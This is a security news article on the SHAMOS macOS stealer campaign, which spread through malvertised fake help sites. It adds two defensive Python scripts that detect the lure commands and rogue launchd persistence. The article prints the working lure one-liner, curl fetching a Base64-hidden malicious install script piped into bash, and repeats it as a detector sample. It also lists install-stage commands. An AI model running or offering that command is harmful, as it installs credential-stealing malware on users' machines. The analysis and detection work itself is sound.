New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials


A malware campaign targeting macOS users ran between June and August 2025 and attempted to compromise more than 300 customer environments through fake help websites.

The operation deploys SHAMOS, a variant of the Atomic macOS Stealer (AMOS), developed by the eCrime group COOKIE SPIDER, which rents the information stealer to other criminals as malware-as-a-service.

The attack begins when users search for common macOS troubleshooting tasks, such as "macos flush resolver cache", and find promoted malvertising websites among their search results.


These fraudulent sites, including mac-safer[.]com and rescue-mac[.]com, masquerade as legitimate technical-support resources.

The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.

CrowdStrike researchers found that the threat actors rely on a straightforward social engineering approach: the victim is presented with seemingly helpful instructions for resolving the technical issue they searched for.

The instructions hide the deception: the victim is told to paste a one-line terminal command that starts the malware installation.

Figure: Search engine results with promoted malvertising website (Source – CrowdStrike)

The researchers also noted that one Google Ads advertiser profile promoting the spoofed websites appears to impersonate a legitimate Australia-based electronics store, so the advertiser identity shown to users was itself spoofed.

Figure: Google advertising profile (Source – CrowdStrike)

Infection Mechanism and Technical Implementation

The infection mechanism relies on a disguised terminal command that victims paste into Terminal without understanding it (reproduced here in its functional form, with the stray quoting from the page extraction removed):

curl -fsSL $(echo "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | base64 -d) | bash

This command performs several operations in sequence. The $( ... ) command substitution decodes the Base64 string to the URL https://icloudservers[.]com/gm/install[.]sh; curl -fsSL then fetches that script silently (-s), following redirects (-L) and producing no output on HTTP errors (-f); and the script body is piped straight into bash, so at this stage nothing is written to disk and the victim never sees what runs.

The script captures the user's password and then downloads the SHAMOS Mach-O executable from https://icloudservers[.]com/gm/update.

Once written to the /tmp/ directory, SHAMOS employs several evasion techniques to avoid detection.

The malware removes extended file attributes with xattr, which strips the com.apple.quarantine flag that Gatekeeper keys on (a file fetched with curl does not carry the quarantine attribute in the first place, so this step is belt-and-braces), marks the binary executable with chmod, and performs anti-virtual-machine checks so that it does not run inside an analysis sandbox.
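A detection a SOC would want for the lure command and the install-stage commands described above, run over process command lines from EDR telemetry or shell history. This is an added example, not CrowdStrike's or the malware's code; the sample lines are constructed for the demo (the first reuses the Base64 string from the lure, which decodes to the install.sh URL), and the scoring thresholds are my own choice.

```python
"""Triage shell one-liners of the kind the fake help pages tell victims to paste.

Added example, not CrowdStrike's or the malware's code. Sample command lines
are constructed; the first reproduces the lure's Base64 string, which decodes
to the install.sh URL named in the write-up."""
import base64
import binascii
import re
from typing import Dict, List

# Base64 runs long enough to hide a URL (the lure's token is 52 characters)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"|)]+")
# download tool whose output is piped straight into an interpreter
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
# $( ... | base64 -d ): the URL only exists after decoding
B64_SUBST = re.compile(r"\$\(.*base64\s+(-d|-D|--decode).*\)")
# install-stage indicators: quarantine flag stripped, staged binary made executable
XATTR_STRIP = re.compile(r"\bxattr\b.*(-c\b|-d\s+com\.apple\.quarantine)")
TMP_EXEC = re.compile(r"\bchmod\s+\+x\s+/(private/)?tmp/")

# constructed samples (assumption: these are the shapes seen in telemetry)
SAMPLES = {
    "shamos_lure": 'curl -fsSL $(echo "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | base64 -d) | bash',
    "install_stage": "xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update",
    "plain_pipe": "curl -fsSL https://example.com/setup.sh | sh",
    "flush_dns": "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",
    "benign_b64": 'echo "aGVsbG8gZnJvbSB0aGUgYmVuaWduIGhvc3Q=" | base64 -d',
}


def decode_b64_tokens(cmdline: str) -> List[str]:
    """Return every Base64 run in cmdline that decodes to printable UTF-8."""
    decoded = []
    for m in B64_TOKEN.finditer(cmdline):
        tok = m.group(0).rstrip("=")
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # long alphanumeric word, not real Base64
        if text.isprintable():
            decoded.append(text)
    return decoded


def defang(url: str) -> str:
    """Make a URL safe to paste into a ticket."""
    return url.replace(".", "[.]")


def analyze(cmdline: str) -> Dict[str, object]:
    """Score one command line; returns verdict, defanged URLs and the reasons."""
    decoded = decode_b64_tokens(cmdline)
    plain_urls = URL_RE.findall(cmdline)
    hidden_urls = [u for text in decoded for u in URL_RE.findall(text)]
    reasons: List[str] = []
    score = 0
    if PIPE_TO_SHELL.search(cmdline):
        score += 2
        reasons.append("download piped into a shell")
    if B64_SUBST.search(cmdline):
        score += 2
        reasons.append("Base64-decoded command substitution")
    if hidden_urls and not plain_urls:
        score += 1
        reasons.append("URL only visible after decoding")
    if XATTR_STRIP.search(cmdline):
        score += 1
        reasons.append("extended attributes / quarantine flag stripped")
    if TMP_EXEC.search(cmdline):
        score += 1
        reasons.append("binary in /tmp made executable")
    verdict = "malicious" if score >= 3 else "suspicious" if score else "benign"
    return {
        "verdict": verdict,
        "score": score,
        "urls": [defang(u) for u in plain_urls + hidden_urls],
        "decoded": decoded,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        r = analyze(line)
        print(f"{name:14} {r['verdict']:10} {r['urls']} {r['reasons']}")
```

The lure line scores on three indicators at once (pipe to shell, Base64 command substitution, URL hidden until decoded), which is what separates it from an ordinary curl | sh installer; the legitimate flush-DNS commands the victim was actually searching for trigger nothing.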

The stealer then runs a series of AppleScript commands (via osascript) for host reconnaissance and data collection.

SHAMOS specifically targets cryptocurrency wallet files, credential databases, Keychain data, Apple Notes content, and browser-stored data.

The malware packages the stolen data into a ZIP archive named out.zip and exfiltrates it with curl to remote servers.

Additionally, SHAMOS establishes persistence through a launchd property list named com.finder.helper.plist written to the LaunchDaemons directory; writing there requires elevated privileges, so this step runs only when sudo privileges are available.
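A hunting routine for the persistence pattern described above, as an added example (not CrowdStrike's or the malware's code): it parses launchd property lists and flags jobs whose binary lives in a world-writable directory, that start at load from such a path, or whose label borrows an Apple component name without being a com.apple. job. The two plists are constructed for the demo; the first mirrors the description (label com.finder.helper, binary staged in /tmp), the second is an ordinary vendor job, and neither is a captured artifact.

```python
"""Hunt launchd plists for the persistence pattern described above.

Added example, not CrowdStrike's or the malware's code. Both plists below are
constructed for the demo; the ProgramArguments path /tmp/update is an
assumption based on the /tmp staging the write-up describes."""
import plistlib
import re
from pathlib import Path
from typing import Dict, List

# a launchd job's binary has no business living in a world-writable directory
WRITABLE_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
# Apple component names borrowed to make a rogue label look like a system job
APPLE_WORDS = re.compile(r"finder|safari|icloud|spotlight|apple", re.I)

SHAMOS_LIKE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key><array><string>/tmp/update</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

VENDOR_JOB = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backupd</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backupd</string><string>--daily</string></array>
  <key>StartInterval</key><integer>86400</integer>
</dict></plist>"""


def triage_plist(data: bytes, filename: str) -> Dict[str, object]:
    """Parse one launchd plist (XML or binary) and return its findings."""
    job = plistlib.loads(data)
    label = str(job.get("Label", ""))
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    program = str(args[0]) if args else ""
    findings: List[str] = []
    if program.startswith(WRITABLE_DIRS):
        findings.append(f"program {program} lives in a world-writable directory")
    if job.get("RunAtLoad") and program.startswith(WRITABLE_DIRS):
        findings.append("RunAtLoad set for a binary staged in a temp directory")
    if APPLE_WORDS.search(label) and not label.startswith("com.apple."):
        findings.append(f"label {label} mimics an Apple component outside com.apple.")
    if label and Path(filename).stem != label:
        findings.append(f"label {label} does not match file name {filename}")
    return {"label": label, "program": program, "findings": findings, "score": len(findings)}


def scan_launchd(dirs=None) -> List[Dict[str, object]]:
    """Walk the system and per-user launchd directories; return only jobs with findings."""
    if dirs is None:
        dirs = ("/Library/LaunchDaemons", "/Library/LaunchAgents",
                str(Path.home() / "Library" / "LaunchAgents"))
    hits = []
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            try:
                result = triage_plist(p.read_bytes(), p.name)
            except Exception as exc:  # unreadable or malformed plist is itself worth a look
                result = {"label": "", "program": "", "findings": [f"could not parse: {exc}"], "score": 1}
            if result["score"]:
                hits.append({"path": str(p), **result})
    return hits


if __name__ == "__main__":
    print("constructed sample:", triage_plist(SHAMOS_LIKE, "com.finder.helper.plist")["findings"])
    for hit in scan_launchd():
        print(hit["path"], hit["findings"])
```

Run it as root on a macOS host to cover /Library/LaunchDaemons; the per-user LaunchAgents directory is included because the same family falls back to user-level persistence when it cannot escalate.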



About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.